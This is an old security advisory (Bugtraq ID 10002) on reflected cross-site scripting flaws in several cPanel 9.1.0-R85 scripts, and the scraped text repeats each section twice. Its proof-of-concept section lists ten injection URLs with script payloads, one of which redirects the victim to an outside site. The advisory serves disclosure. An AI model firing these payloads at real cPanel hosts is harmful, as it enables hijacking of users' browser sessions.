cPanel Multiple Module Cross-Site Scripting Vulnerabilities
BID:10002
Info
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 10002 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2004 12:00AM |
| Updated: | Mar 30 2004 12:00AM |
| Credit: | Discovery is credited to sullo <[email protected]>. |
| Vulnerable: |
cPanel cPanel 9.1 .0-R85 |
| Not Vulnerable: | |
Discussion
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
Multiple cross-site scripting vulnerabilities have been identified in cPanel that may allow an attacker to execute arbitrary HTML or script code in a user's browser. These issues exist due to a failure of the application to properly validate user-supplied URI input.
The issues are reported to affect the 'account', 'db', 'login', 'email', 'dir', 'dns' and 'ip' parameters of 'ignorelist.html', 'showlog.html', 'repairdb.html', 'doaddftp.html', 'editmsg.html', 'testfile.html', 'erredit.html', 'dnslook.html', 'del.html' and 'index.html' scripts.
The issues have been reported to affect version 9.1.0-R85 of the software, it is quite likely however that these issues affect previous versions of the software as well.
Multiple cross-site scripting vulnerabilities have been identified in cPanel that may allow an attacker to execute arbitrary HTML or script code in a user's browser. These issues exist due to a failure of the application to properly validate user-supplied URI input.
The issues are reported to affect the 'account', 'db', 'login', 'email', 'dir', 'dns' and 'ip' parameters of 'ignorelist.html', 'showlog.html', 'repairdb.html', 'doaddftp.html', 'editmsg.html', 'testfile.html', 'erredit.html', 'dnslook.html', 'del.html' and 'index.html' scripts.
The issues have been reported to affect version 9.1.0-R85 of the software, it is quite likely however that these issues affect previous versions of the software as well.
Exploit / POC
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script>
http://www.example.com/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script>
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script>
http://www.example.com/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script>
Solution / Fix
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
References:
References: